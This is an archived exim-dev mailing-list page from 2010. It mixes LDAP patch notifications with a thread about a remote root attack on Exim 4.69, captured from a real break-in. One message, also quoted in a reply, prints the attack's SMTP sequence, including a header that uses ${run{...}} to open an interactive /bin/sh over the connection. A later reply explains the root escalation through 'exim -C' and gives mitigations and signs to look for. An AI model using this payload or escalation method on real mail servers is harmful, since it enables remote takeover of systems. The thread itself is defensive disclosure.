headers
Adam | 7 Dec 2010 10:35
Picon

[Bug 230] A number of LDAP-related things

------- You are receiving this mail because: -------
You are the QA contact for the bug.

http://bugs.exim.org/show_bug.cgi?id=230

Nigel Metheringham <nigel <at> exim.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
   Target Milestone|Exim 4.72                   |Exim 4.73

--- Comment #3 from Adam <adam <at> NetBSD.org>  2010-12-07 09:35:53 ---
Created an attachment (id=426)
 --> (http://bugs.exim.org/attachment.cgi?id=426)
Patch for src/lookups/ldap.c to enable LDAP extendend features.

-- 
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 0 comments |
headers
Adam | 7 Dec 2010 10:37
Picon

[Bug 230] A number of LDAP-related things

------- You are receiving this mail because: -------
You are the QA contact for the bug.

http://bugs.exim.org/show_bug.cgi?id=230

--- Comment #6 from Adam <adam <at> NetBSD.org>  2010-12-07 09:37:55 ---
Created an attachment (id=429)
 --> (http://bugs.exim.org/attachment.cgi?id=429)
Patch for src/globals.c to enable LDAP extendend features.

-- 
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 0 comments |
headers
Adam | 7 Dec 2010 10:37
Picon

[Bug 230] A number of LDAP-related things

------- You are receiving this mail because: -------
You are the QA contact for the bug.

http://bugs.exim.org/show_bug.cgi?id=230

--- Comment #5 from Adam <adam <at> NetBSD.org>  2010-12-07 09:37:24 ---
Created an attachment (id=428)
 --> (http://bugs.exim.org/attachment.cgi?id=428)
Patch for src/readconf.c to enable LDAP extendend features.

-- 
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 0 comments |
headers
Sergey Kononenko | 7 Dec 2010 22:59
Picon

Remote root vulnerability in Exim

Hi,

While investigating security break in the network of my company, I've
captured (by tcpdump) sequence of successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find email of current maintainer of Exim, so I've decided to
write to this mailing lists. I don't want to publish all details of
attack before developers can investigate and fix vulnerability.
So I ask Exim maintainers to contact me and I will send them complete
captured sequence of attack.
Here I can put brief sequence of attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e <at> somedomain.com>
RCPT TO: <postmaster <at> targetdomain.com>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
.... 
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
..........
about 700000 the same strings
..........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILb
.
MAIL FROM: <orderruc0e <at> somedomain.com>
RCPT TO: <postmaster <at> targetdomain.com>
(Continue reading)

Permalink | Reply | 33 comments |
headers
Adam | 7 Dec 2010 10:36
Picon

[Bug 230] A number of LDAP-related things

------- You are receiving this mail because: -------
You are the QA contact for the bug.

http://bugs.exim.org/show_bug.cgi?id=230

--- Comment #4 from Adam <adam <at> NetBSD.org>  2010-12-07 09:36:50 ---
Created an attachment (id=427)
 --> (http://bugs.exim.org/attachment.cgi?id=427)
Patch for src/globals.h to enable LDAP extendend features.

-- 
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 0 comments |
headers
Patrick Cernko | 8 Dec 2010 09:58
Favicon

Re: Remote root vulnerability in Exim

Hi Sergey, hi list,

On 07.12.2010 22:59, Sergey Kononenko wrote:
> Hi,
> 
> While investigating security break in the network of my company, I've
> captured (by tcpdump) sequence of successful remote root attack through
> Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find email of current maintainer of Exim, so I've decided to
> write to this mailing lists. I don't want to publish all details of
> attack before developers can investigate and fix vulnerability.
> So I ask Exim maintainers to contact me and I will send them complete
> captured sequence of attack.

I can fully understand why you do not want to publish details of the
attack and support it too. But maybe you could publish extracts from the
logs which might indicate the attack? That way, administrators (like me)
might have a chance to check if their systems are attacked already.

> Here I can put brief sequence of attack:
> 
> EHLO mail.domain.com
> MAIL FROM: <orderruc0e <at> somedomain.com>
> RCPT TO: <postmaster <at> targetdomain.com>
> DATA
> MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
> .... 
> MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
> HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
(Continue reading)

Permalink | Reply | 1 comment |
headers
Ted Cooper | 9 Dec 2010 03:18
Favicon

Re: Remote root vulnerability in Exim

On 08/12/10 18:58, Patrick Cernko wrote:
> I can fully understand why you do not want to publish details of the
> attack and support it too. But maybe you could publish extracts from the
> logs which might indicate the attack? That way, administrators (like me)
> might have a chance to check if their systems are attacked already.

You can check out the spool directory for strange files like e.conf or
setuid.

Also, when that e.conf was run, I got a message in my log file that the
queue had been run when I normally have that turned off. That's only if
the attacker runs it with -q though.

eg
2010-12-09 12:03:46 Start queue run: pid=4010
2010-12-09 12:03:46 End queue run: pid=4010

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 0 comments |
headers
Ted Cooper | 9 Dec 2010 03:27
Favicon

Re: Remote root vulnerability in Exim

On 08/12/10 07:59, Sergey Kononenko wrote:
> Hi,
> 
> While investigating security break in the network of my company, I've
> captured (by tcpdump) sequence of successful remote root attack through
> Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find email of current maintainer of Exim, so I've decided to
> write to this mailing lists. I don't want to publish all details of
> attack before developers can investigate and fix vulnerability.
> So I ask Exim maintainers to contact me and I will send them complete
> captured sequence of attack.
> Here I can put brief sequence of attack:

I've had a quick look at this and so far the issue is certainly real enough.

The exim -> root escalation is because the exim user is priviledged in
exim and can use -C command line opt along with setuid bit set on exim
binary. No other users normally have this but it can be configure to
allow it.

eg with normal user
$ exim -Ce.conf -q
exim: permission denied

Mitigation to prevent root upgrade can be to remove the setuid bit if
you don't do local deliveries, use the command line "sendmail" interface
or anything else that needs it.

Better mitigation is to recompile exim with ALT_CONFIG_PREFIX set to
somewhere that the exim user cannot write to (/etc/exim?), or set
(Continue reading)

Permalink | Reply | 11 comments |
headers
Brad Jorsch | 9 Dec 2010 15:20
Picon
Gravatar

Re: Remote root vulnerability in Exim

On Thu, Dec 09, 2010 at 12:27:30PM +1000, Ted Cooper wrote:
> 
> The real issue here is why Exim is treating the HeaderX line like
> trusted configuration data. There must be a buffer overflow but I
> haven't spotted it in the few minutes I've looked at this. I can
> probably find it without the data dump but if someone else can put some
> eyes on this too that would be great. I'm not that good at spotting
> things like this but no-one else has said anything.

I've tried to take a look, but I haven't been able to reproduce it in a
quick attempt.

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 7 comments |
headers
Ted Cooper | 9 Dec 2010 15:47
Favicon

Re: Remote root vulnerability in Exim

On 10/12/10 00:20, Brad Jorsch wrote:
> I've tried to take a look, but I haven't been able to reproduce it in a
> quick attempt.

My attempt to hunt it down without the dump ended up being quite
fruitless, except for finding where the headers are read in and the
memory allocated for them. After grabbing the dump off Sergey I
discovered I was thinking far too small with the amount of data that was
being sent.

I'm in the process of attempting to write something to reproduce the
result but I have a feeling it's going to be based on a very exact
amount of data being sent which is very dependant on the system exim is
running on.

Is anyone else working on this in the background?

--

-- 
## List details at http://lists.exim.org/mailman/listinfo/exim-dev Exim details at
http://www.exim.org/ ##
Permalink | Reply | 6 comments |

Gmane